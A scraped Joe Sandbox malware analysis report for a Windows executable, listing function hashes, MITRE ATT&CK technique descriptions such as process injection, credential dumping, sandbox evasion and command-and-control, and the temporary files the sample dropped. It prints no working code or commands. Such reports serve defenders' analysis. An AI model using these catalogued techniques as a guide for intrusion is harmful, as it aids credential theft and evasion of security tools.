Snapshot File: hcaresult_0_2_cb0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd42cf79a013e78b3f7f0ea47c723e4a3a9152662ca943ac286e213e20de2c79
Instruction ID: 5a30282a4ea76a6fefb1a99ed936f3a88032f6f404f9672074e823d2f01eb506
Opcode Fuzzy Hash: fd42cf79a013e78b3f7f0ea47c723e4a3a9152662ca943ac286e213e20de2c79
Instruction Fuzzy Hash: BBD05E343012108FCB44AB38D414958B7E9EF4962631840A9E809CB721CE32EC428B80

Function 064BA278 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887429400.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64b0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a862c53c1347466dbd710c162635656d08f43b86dc2498819c5b498a1ad127
Instruction ID: 39db246c4becb4158d44a945442bba8475da251511eadec87d8c08dd7a44c25b
Opcode Fuzzy Hash: b8a862c53c1347466dbd710c162635656d08f43b86dc2498819c5b498a1ad127
Instruction Fuzzy Hash: 20D05E70A0120DEFCB40EFB8E9116ADB7F9EB84200B1089A9D508D7210EA316F04EB91

Function 00CBCB80 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4877616232.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a5b18401beded51b00b94065442983f3b63ae62cfcc2982046c51ad1f60854
Instruction ID: 0bc3dc42e1518c514d97521a46869931e0cf107e74e3722de6458a7066a75d5a
Opcode Fuzzy Hash: a0a5b18401beded51b00b94065442983f3b63ae62cfcc2982046c51ad1f60854
Instruction Fuzzy Hash: 3FD012346491844FCB00C628C4889457BB2AF8911876881ECD44DDBB22D56798078B00

Function 064B8460 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887429400.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64b0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9526250b6baa8a998820c7aeba95944f53bf6168f48a0ad1ed413c8df187233e
Instruction ID: 9e860e27d8f11d2310df6385f0b09ebd1ae005f022f8c8e6d414f886bdbebb2c
Opcode Fuzzy Hash: 9526250b6baa8a998820c7aeba95944f53bf6168f48a0ad1ed413c8df187233e
Instruction Fuzzy Hash: E5C012713046244BC604965CD410D59779D9B49724B0100A6E909CB761C992EC4147D4

Function 00CBB7C9 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4877616232.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550c1fcbecadc1f1e673eb2bfa37fa667596783bd079bf4fb983aadae2376eae
Instruction ID: 4b3b3e52baa7c79b67488417b92310ede2322aaa4c5dd39e6301e17b9fa69aa9
Opcode Fuzzy Hash: 550c1fcbecadc1f1e673eb2bfa37fa667596783bd079bf4fb983aadae2376eae
Instruction Fuzzy Hash: B6D0A9242092C00FC395877D6060292BFE2EFC2218B2882ECD0C88B243C412880B8B04

Function 064B3990 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887429400.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64b0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb48b6e5de1c8b17e0e346b0119497e6dfcd0426ad0f979ec0bdf2015f7cd8c
Instruction ID: 00fd6658a23f6add80222c337f6d1659eff40374c4ba6607149588e010f9257d
Opcode Fuzzy Hash: afb48b6e5de1c8b17e0e346b0119497e6dfcd0426ad0f979ec0bdf2015f7cd8c
Instruction Fuzzy Hash: 66D0C931A050109FC385DB89E894CA2B3E6EB8D314B1AC0EEE4098B356CA71DC43CB90

Function 00CBCB90 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4877616232.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c83be5f003e00b8d190a7323357476b95527142a6d1f1e6151771a48f32cb
Instruction ID: 2766da562f3e1a9fa2858af7536e661d92a05aaef3db48e407eab7465cbb5324
Opcode Fuzzy Hash: 2f9c83be5f003e00b8d190a7323357476b95527142a6d1f1e6151771a48f32cb
Instruction Fuzzy Hash: B0C002343506088F8744DA5DD484815B3EAAF8DA1836480E9E94DCB726DA32FC038A40

Function 064B6AE0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887429400.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64b0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544dae8e3549129217c5beaed9dd12a62e8a27fade0f63907fc1fd684f7a9e3b
Instruction ID: b657f8b0cf54a84d1b25b8cf25b816cab7be7ff988c4e65ebb3b7a5a11aa0225
Opcode Fuzzy Hash: 544dae8e3549129217c5beaed9dd12a62e8a27fade0f63907fc1fd684f7a9e3b
Instruction Fuzzy Hash: D4D0C97094821AEFEB648F80D4AA7EFBF70FB00314F21141AF002A6190CBB90185CFE0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7fE6IkvYWf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_7fE6IkvYWf.exe_5c3cf58afc30521a682b8033a8cc6ff47162652_9065eb77_9893a879-c385-4671-a268-8e898a336684\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FC4.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER312C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER315C.tmp.xml

C:\Users\user\AppData\Local\Temp\43caou4g.dhw

C:\Users\user\AppData\Local\Temp\gu1wuocw.yoi

C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat

C:\Users\user\AppData\Local\Temp\tmpDC5.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpDD5.tmp.tmpdb

C:\Users\user\AppData\Local\Temp\tmpE15.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE16.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE17.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE18.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE38.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE39.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE3A.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE3B.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE3C.tmp.dat

C:\Windows\appcompat\Programs\Amcache.hve

Windows Analysis Report
7fE6IkvYWf.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre